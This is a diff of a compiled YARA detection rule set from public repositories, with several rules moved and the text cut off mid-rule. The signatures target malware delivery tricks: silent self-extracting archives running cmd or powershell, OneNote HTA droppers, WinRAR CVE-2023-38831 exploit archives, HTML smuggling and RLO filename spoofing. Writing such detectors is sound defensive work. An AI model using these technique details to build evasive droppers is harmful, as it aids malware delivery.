ELCEEF_Obfuscated_IP_Address_In_URL +{ + meta: + description = "Detects hexadecimal and octal IP address representations in URL" + author = "marcin@ulikowski.pl" + id = "f2ebf5f7-5446-5eaa-8e30-90d08b8616d9" + date = "2020-09-17" + modified = "2024-03-04" + reference = "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam/" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Obfuscated_IPAddr_URL.yara#L1-L17" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "ab2a2a3a56e6eed9f4a3a8f994c89a167f00b86ce442820c81d8ee673b0ab85c" + score = 75 + quality = 65 + tags = "" + + strings: + $ = /="?http:\/\/0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.?\// nocase ascii wide + $ = /="?http:\/\/0x[0-9a-f]{8}\.?\// nocase ascii wide + $ = /="?http:\/\/0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.?\// nocase ascii wide + $ = /="?http:\/\/[0-9]{8,10}\.?\// nocase ascii wide + + condition: + any of them +} +rule ELCEEF_HTA_Wscriptshell_Onenote : FILE +{ + meta: + description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell" + author = "marcin@ulikowski.pl" + id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff" + date = "2023-02-01" + modified = "2023-02-02" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTA_OneNote.yara#L1-L17" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c" + score = 65 + quality = 75 + tags = "FILE" + hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c" + + strings: + $magic = { ae b1 53 78 d0 29 96 d3 } + $hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 } + $wsh = "CreateObject(\"WScript.Shell\")" + + condition: + filesize <5MB and $magic at 8 and $wsh and $hta +} +rule ELCEEF_HTML_Windows_Search_Abuse +{ + meta: + description = "Detects HTML files abusing Windows system functionalities to redirect and download malicious payloads" + author = "marcin@ulikowski.pl" + id = "537cb46e-4cfc-517c-8d6d-0019f2c3e5ef" + date = "2024-06-15" + modified = "2024-06-16" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTML_Windows_Search.yara#L1-L22" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "6a0d490cf08ab0aad3c535645abe9ebc26d12768cf2a2e932cdb7ec93cf3e2bd" + score = 75 + quality = 73 + tags = "" + hash1 = "d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30" + + strings: + $location1 = "location.href" wide ascii + $location2 = "location.replace(" wide ascii + $location3 = "location.assign(" wide ascii + $metarefresh = "<meta http-equiv=\"refresh\"" nocase wide ascii + $search1 = "\"search-ms:query=" wide ascii + $search2 = "\"search:query=" wide ascii + $search3 = "URL=search:query=" wide ascii + $crumb1 = "&crumb=location:" wide ascii + $crumb2 = "&crumb=location:" wide ascii + + condition: + ( any of ($location*) or $metarefresh) and any of ($search*) and any of ($crumb*) +} +rule ELCEEF_Suspicious_SFX : FILE +{ + meta: + description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe" + author = "marcin@ulikowski.pl" + id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8" + date = "2023-04-04" + modified = "2023-04-04" + reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_SFX.yara#L1-L22" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a" + score = 65 + quality = 73 + tags = "FILE" + + strings: + $rar = { 52 61 72 21 } + $zip = { 50 4b 03 04 } + $setup_cmd = "\nSetup=cmd" + $setup_powershell = "\nSetup=powershell" + $silent = "\nSilent=1" + + condition: + filesize <1MB and uint16be(0)==0x4d5a and any of ($zip,$rar) and any of ($setup_*) and $silent +} +rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE +{ + meta: + description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR" + author = "marcin@ulikowski.pl" + id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f" + date = "2023-09-23" + modified = "2023-09-28" + reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/WinRAR_CVE_2023_38831.yara#L1-L17" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1" + score = 75 + quality = 75 + tags = "CVE-2023-38831, FILE" + hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0" + hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885" + + strings: + $ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) } + + condition: + uint16be(0)==0x504b and all of them +} +rule ELCEEF_Suspicious_Onenote +{ + meta: + description = "Detects OneNote documents with FileDataStoreObject structure containing: PE32, shortcut files (*.lnk), encoded JS, Windows Help File (*.chm), or batch script" + author = "marcin@ulikowski.pl" + id = "57f6fc7f-666f-5887-ac97-513588415757" + date = "2023-01-22" + modified = "2023-02-21" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_OneNote.yara#L1-L23" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "b65f0976b71c1e827ecce09f0c435d9ffa6a5d3b3a41401efc6a14b6259af4ad" + score = 65 + quality = 75 + tags = "" + hash1 = "f408ef3fa89546483ba63f58be3f27a98795655eb4b9b6217cbe302a5ba9d5f7" + hash2 = "5306fa7940b4d67dfb031fd315b661cecb2ce81e2f34c9393e1826df0f0bbdc5" + hash3 = "e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e" + hash4 = "9e89231578d8b9b190de3288fd10f43cf11a24963a8b0a76f0c46170deda59fd" + hash5 = "6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc" + + strings: + $magic = { ae b1 53 78 d0 29 96 d3 } + $fdso_pe32 = { a4 c4 8d 4d 0b 7a 9e ac [20] 4d 5a } + $fdso_bat = { a4 c4 8d 4d 0b 7a 9e ac [20] 40 65 63 68 6f 20 6f 66 66 } + $fdso_lnk = { a4 c4 8d 4d 0b 7a 9e ac [20] 4c 00 00 00 01 14 02 00 } + $fdso_jse = { a4 c4 8d 4d 0b 7a 9e ac [20] 23 40 7e 5e } + $fdso_chm = { a4 c4 8d 4d 0b 7a 9e ac [20] 49 54 53 46 03 } + + condition: + $magic at 8 and 1 of ($fdso_*) +} +rule ELCEEF_Base64_SVG_Javascript +{ + meta: + description = "Detects base64 encoded SVG objects containing Javascript" + author = "marcin@ulikowski.pl" + id = "99275772-1f4f-5616-9a9c-f76b613fe143" + date = "2022-10-25" + modified = "2022-12-12" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Base64_SVG_Javascript.yara#L1-L16" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc" + score = 75 + quality = 75 + tags = "" + hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8" + hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19" + + strings: + $svg = "\"data:image/svg+xml;base64" wide ascii + $js = "<script type=\"text/javascript\">" base64 + + condition: + all of them +} +rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE +{ + meta: + description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros" + author = "marcin@ulikowski.pl" + id = "9244fdb7-9949-58a0-9e39-e61e04cc1574" + date = "2021-12-01" + modified = "2023-04-04" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/OLE2_Reversed.yara#L1-L20" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf" + score = 65 + quality = 67 + tags = "FILE" + + strings: + $auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase + $http = /\/\/:s?ptth/ wide ascii + $programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase + $windows = /\\swodniW\\\\?:C/ wide ascii nocase + + condition: + filesize <1MB and uint32be(0)==0xd0cf11e0 and $auto_open and any of ($http,$programdata,$windows) +} rule ELCEEF_HTML_Smuggling_A : T1027 FILE { meta: @@ -212976,38 +215131,6 @@ rule ELCEEF_HTML_Smuggling_C : T1027 FILE condition: filesize <5MB and $mssave and #blob==1 and #array==1 and #loop==1 } -rule ELCEEF_EICAR_Encrypted_ZIP -{ - meta: - description = "Detects EICAR file in any encrypted ZIP archive" - author = "marcin@ulikowski.pl" - id = "c12d42de-356a-584b-9c48-71e65940f1cf" - date = "2022-12-13" - modified = "2022-12-16" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/EICAR_Encrypted_ZIP.yara#L14-L44" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "56851056671bde38338bd200d9fde59c042f35a2cd84ac9401e716f376c9502c" - score = 75 - quality = 75 - tags = "" - - strings: - $local = { - 50 4b 03 04 // local file header signature (PK) - ?? 00 // minimum version - ?? 00 // flags (bit 0 and 6 indicate encryption) - ?? 00 // compression method - ?? ?? // last modification time - ?? ?? // last modification date - ?? ?? ?? ?? // CRC-32 of uncompressed and unencrypted data - ?? ?? ?? ?? // compressed size - ?? ?? ?? ?? // uncompressed size - } - - condition: - for any i in (1..#local) : (( uint8(@local[i]+6)&0x01 or uint8(@local[i]+6)&0x40) and uint32(@local[i]+14)==0x6851cf3c and uint32(@local[i]+22)==68) -} rule ELCEEF_BAT_Obfuscated_Setenv { meta: @@ -213106,249 +215229,43 @@ rule ELCEEF_Polymorph_BAT_CAB : FILE condition: uint32be(0)==0x4d534346 and uint32(16)>80 and $extract in (48..80) } -rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE -{ - meta: - description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio" - author = "marcin@ulikowski.pl" - id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba" - date = "2023-03-08" - modified = "2023-03-08" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b" - hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1" - - strings: - $magic = { 50 4b 03 04 } - $ext = ".doc" - - condition: - filesize <1MB and $magic at 0 and #magic==1 and uint32(22)>1024*1024*100 and $ext at ( uint16(26)+26) -} -rule ELCEEF_Base64_SVG_Javascript -{ - meta: - description = "Detects base64 encoded SVG objects containing Javascript" - author = "marcin@ulikowski.pl" - id = "99275772-1f4f-5616-9a9c-f76b613fe143" - date = "2022-10-25" - modified = "2022-12-12" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Base64_SVG_Javascript.yara#L1-L16" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc" - score = 75 - quality = 75 - tags = "" - hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8" - hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19" - - strings: - $svg = "\"data:image/svg+xml;base64" wide ascii - $js = "<script type=\"text/javascript\">" base64 - - condition: - all of them -} -rule ELCEEF_Suspicious_Onenote -{ - meta: - description = "Detects OneNote documents with FileDataStoreObject structure containing: PE32, shortcut files (*.lnk), encoded JS, Windows Help File (*.chm), or batch script" - author = "marcin@ulikowski.pl" - id = "57f6fc7f-666f-5887-ac97-513588415757" - date = "2023-01-22" - modified = "2023-02-21" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_OneNote.yara#L1-L23" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "b65f0976b71c1e827ecce09f0c435d9ffa6a5d3b3a41401efc6a14b6259af4ad" - score = 65 - quality = 75 - tags = "" - hash1 = "f408ef3fa89546483ba63f58be3f27a98795655eb4b9b6217cbe302a5ba9d5f7" - hash2 = "5306fa7940b4d67dfb031fd315b661cecb2ce81e2f34c9393e1826df0f0bbdc5" - hash3 = "e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e" - hash4 = "9e89231578d8b9b190de3288fd10f43cf11a24963a8b0a76f0c46170deda59fd" - hash5 = "6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc" - - strings: - $magic = { ae b1 53 78 d0 29 96 d3 } - $fdso_pe32 = { a4 c4 8d 4d 0b 7a 9e ac [20] 4d 5a } - $fdso_bat = { a4 c4 8d 4d 0b 7a 9e ac [20] 40 65 63 68 6f 20 6f 66 66 } - $fdso_lnk = { a4 c4 8d 4d 0b 7a 9e ac [20] 4c 00 00 00 01 14 02 00 } - $fdso_jse = { a4 c4 8d 4d 0b 7a 9e ac [20] 23 40 7e 5e } - $fdso_chm = { a4 c4 8d 4d 0b 7a 9e ac [20] 49 54 53 46 03 } - - condition: - $magic at 8 and 1 of ($fdso_*) -} -rule ELCEEF_Suspicious_SFX : FILE -{ - meta: - description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe" - author = "marcin@ulikowski.pl" - id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8" - date = "2023-04-04" - modified = "2023-04-04" - reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_SFX.yara#L1-L22" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a" - score = 65 - quality = 73 - tags = "FILE" - - strings: - $rar = { 52 61 72 21 } - $zip = { 50 4b 03 04 } - $setup_cmd = "\nSetup=cmd" - $setup_powershell = "\nSetup=powershell" - $silent = "\nSilent=1" - - condition: - filesize <1MB and uint16be(0)==0x4d5a and any of ($zip,$rar) and any of ($setup_*) and $silent -} -rule ELCEEF_HTA_Wscriptshell_Onenote : FILE -{ - meta: - description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell" - author = "marcin@ulikowski.pl" - id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff" - date = "2023-02-01" - modified = "2023-02-02" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTA_OneNote.yara#L1-L17" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c" - score = 65 - quality = 75 - tags = "FILE" - hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c" - - strings: - $magic = { ae b1 53 78 d0 29 96 d3 } - $hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 } - $wsh = "CreateObject(\"WScript.Shell\")" - - condition: - filesize <5MB and $magic at 8 and $wsh and $hta -} -rule ELCEEF_HTML_Windows_Search_Abuse -{ - meta: - description = "Detects HTML files abusing Windows system functionalities to redirect and download malicious payloads" - author = "marcin@ulikowski.pl" - id = "537cb46e-4cfc-517c-8d6d-0019f2c3e5ef" - date = "2024-06-15" - modified = "2024-06-16" - reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTML_Windows_Search.yara#L1-L22" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "6a0d490cf08ab0aad3c535645abe9ebc26d12768cf2a2e932cdb7ec93cf3e2bd" - score = 75 - quality = 73 - tags = "" - hash1 = "d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30" - - strings: - $location1 = "location.href" wide ascii - $location2 = "location.replace(" wide ascii - $location3 = "location.assign(" wide ascii - $metarefresh = "<meta http-equiv=\"refresh\"" nocase wide ascii - $search1 = "\"search-ms:query=" wide ascii - $search2 = "\"search:query=" wide ascii - $search3 = "URL=search:query=" wide ascii - $crumb1 = "&crumb=location:" wide ascii - $crumb2 = "&crumb=location:" wide ascii - - condition: - ( any of ($location*) or $metarefresh) and any of ($search*) and any of ($crumb*) -} -rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE +rule ELCEEF_EICAR_Encrypted_ZIP { meta: - description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros" + description = "Detects EICAR file in any encrypted ZIP archive" author = "marcin@ulikowski.pl" - id = "9244fdb7-9949-58a0-9e39-e61e04cc1574" - date = "2021-12-01" - modified = "2023-04-04" + id = "c12d42de-356a-584b-9c48-71e65940f1cf" + date = "2022-12-13" + modified = "2022-12-16" reference = "https://github.com/elceef/yara-rulz" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/OLE2_Reversed.yara#L1-L20" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf" - score = 65 - quality = 67 - tags = "FILE" - - strings: - $auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase - $http = /\/\/:s?ptth/ wide ascii - $programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase - $windows = /\\swodniW\\\\?:C/ wide ascii nocase - - condition: - filesize <1MB and uint32be(0)==0xd0cf11e0 and $auto_open and any of ($http,$programdata,$windows) -} -rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE -{ - meta: - description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR" - author = "marcin@ulikowski.pl" - id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f" - date = "2023-09-23" - modified = "2023-09-28" - reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/WinRAR_CVE_2023_38831.yara#L1-L17" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/EICAR_Encrypted_ZIP.yara#L14-L44" license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1" + logic_hash = "56851056671bde38338bd200d9fde59c042f35a2cd84ac9401e716f376c9502c" score = 75 quality = 75 - tags = "CVE-2023-38831, FILE" - hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0" - hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885" - - strings: - $ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) } - - condition: - uint16be(0)==0x504b and all of them -} -rule ELCEEF_Obfuscated_IP_Address_In_URL -{ - meta: - description = "Detects hexadecimal and octal IP address representations in URL" - author = "marcin@ulikowski.pl" - id = "f2ebf5f7-5446-5eaa-8e30-90d08b8616d9" - date = "2020-09-17" - modified = "2024-03-04" - reference = "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam/" - source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Obfuscated_IPAddr_URL.yara#L1-L17" - license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" - logic_hash = "ab2a2a3a56e6eed9f4a3a8f994c89a167f00b86ce442820c81d8ee673b0ab85c" - score = 75 - quality = 65 tags = "" strings: - $ = /="?http:\/\/0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.?\// nocase ascii wide - $ = /="?http:\/\/0x[0-9a-f]{8}\.?\// nocase ascii wide - $ = /="?http:\/\/0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.?\// nocase ascii wide - $ = /="?http:\/\/[0-9]{8,10}\.?\// nocase ascii wide + $local = { + 50 4b 03 04 // local file header signature (PK) + ?? 00 // minimum version + ?? 00 // flags (bit 0 and 6 indicate encryption) + ?? 00 // compression method + ?? ?? // last modification time + ?? ?? // last modification date + ?? ?? ?? ?? // CRC-32 of uncompressed and unencrypted data + ?? ?? ?? ?? // compressed size + ?? ?? ?? ?? // uncompressed size + } condition: - any of them + for any i in (1..#local) : (( uint8(@local[i]+6)&0x01 or uint8(@local[i]+6)&0x40) and uint32(@local[i]+14)==0x6851cf3c and uint32(@local[i]+22)==68) } /* * YARA Rule Set * Repository Name: GodModeRules * Repository: https://github.com/Neo23x0/god-mode-rules/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 436dc682164cf17a123d6b09d1424e7e2acf0c25 * Number of Rules: 1 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -213619,7 +215536,7 @@ rule GODMODERULES_IDDQD_God_Mode_Rule * YARA Rule Set * Repository Name: Cod3nym * Repository: https://github.com/cod3nym/detection-rules/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ad485bff0ce30afb56e367b7f2b76fea81e78fc9 * Number of Rules: 13 * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance) @@ -213667,165 +215584,149 @@ OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. */ -rule COD3NYM_SUSP_RLO_Exe_Extension_Spoofing_Jan24 +rule COD3NYM_Eazfuscator_String_Encryption : SUSPICIOUS OBFUSCATION FILE { - meta: - description = "Detects Right-To-Left (RLO) Unicode (U+202E) extension spoofing for .exe files" - author = "Jonathan Peters" - id = "60c1a8db-6bfc-547b-98d9-21c198a703f0" - date = "2024-01-14" - modified = "2024-02-19" - reference = "https://unprotect.it/technique/right-to-left-override-rlo-extension-spoofing/" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_rlo_exe_extension_spoofing.yar#L2-L58" + meta: + description = "Eazfuscator.NET string encryption" + author = "Jonathan Peters" + id = "09a400f5-e837-58c2-9b51-9213c8ab0883" + date = "2024-01-01" + modified = "2024-01-10" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/obfuscators.yar#L1-L29" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "cae0ab10f7c1afd7941aff767a9b59901270e3de4d44167e932dae0991515487" - logic_hash = "6126f36b3cd695b4002c29c9163faa6ec295699863d8db7fe17afc407f5a5736" - score = 70 - quality = 55 - tags = "" + hash = "3a9ee09ed965e3aee677043ba42c7fdbece0150ef9d1382c518b4b96bbd0e442" + logic_hash = "5f3f3358e3cfb274aa2e8465dde58a080f9fb282aa519885b9d39429521db6d9" + score = 65 + quality = 80 + tags = "SUSPICIOUS, OBFUSCATION, FILE" + name = "Eazfuscator" + category = "obfuscation" + reliability = 90 + tlp = "TLP:white" strings: - $ = { E2 80 AE 76 73 63 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 66 64 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 78 73 6C 78 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 78 63 6F 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 70 69 7A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 67 6E 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 67 65 70 6A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 67 70 6A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6E 6C 73 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 74 78 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 66 64 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 78 74 70 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 74 64 6f ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 63 74 65 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 66 69 67 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 70 6d 62 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 66 66 69 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 67 76 73 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 34 70 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 69 76 61 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 76 6f 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 76 6d 77 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 76 6c 66 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 76 6b 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 33 70 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 76 61 77 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 63 61 61 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 63 61 6c 66 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 67 67 6f ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 61 6d 77 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 72 61 72 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 7a 37 ( 